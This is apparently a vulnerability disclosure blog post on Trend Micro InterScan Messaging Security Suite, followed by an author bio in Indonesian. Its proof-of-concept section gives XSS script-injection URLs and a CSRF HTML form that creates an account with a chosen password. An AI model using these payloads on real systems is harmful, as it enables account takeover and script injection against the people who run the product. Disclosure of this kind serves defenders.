Trend Micro InterScan Messaging Security Suite is vulnerable to Cross-site Scripting and Cross-site Request Forgery.

Proof of Concept

The vulnerabilities POC are as follow:

Cross-site Scripting (CVE-2012-2995) (CWE-79)

Persistent/Stored XSS
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script>alert('XSS')</script>
Non-persistent/Reflected XSS
hxxps://127.0.0.1/initUpdSchPage.imss?src=<script>alert('XSS')</script>
Cross-Site Request Forgery (CVE-2012-2996) (CWE-352)
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

Solution

Currently, we are not aware of any vendor solution. You may contact the vendor for patch or update of the product.
As a temporary solution, you may restrict access to this application to prevent unauthorized user make use of this vulnerability.

References

http://cwe.mitre.org/data/definitions/352.html
http://cwe.mitre.org/data/definitions/79.html
http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html

 

About the Author modpr0be

Thomas Gregory (modpr0be) saat ini adalah direktur dan pemilik PT Spentera, sebuah perusahaan yang fokus dalam bidang penetration test, incident response, intrusion analysis and forensic investigation. Saya sering memberikan konsultasi tentang strategi keamanan kepada investor, mitra, dan pelanggan. Di sela-sela pekerjaannya, penulis memberikan materi dalam bentuk pelatihan dan kontribusi komunitas dalam bentuk seminar, workshop, dan diskusi dengan berbagai topik seperti teknik peretasan, teknik eksploitasi, dan analisis intrusi. Saya juga berkontribusi untuk repositori eksploit Metasploit Framework sebagai pengembang kode eksploit. Saat ini saya memegang sertifikasi dari Offensive Security Certified Professional (OSCP), Offensive Security Certified Expert (OSCE), ISO/IEC ISMS 27001: 2013 Lead Auditor/Auditor, GIAC Certified Intrusion Analyst (GCIA), dan Offensive Security Exploitation Expert (OSEE). Jika ingin menghubungi saya dapat melalui email di tom at spentera dot id.

Tinggalkan Balasan

Please log in using one of these methods to post your comment:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout /  Ubah )

Foto Google

You are commenting using your Google account. Logout /  Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout /  Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout /  Ubah )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

%d blogger menyukai ini: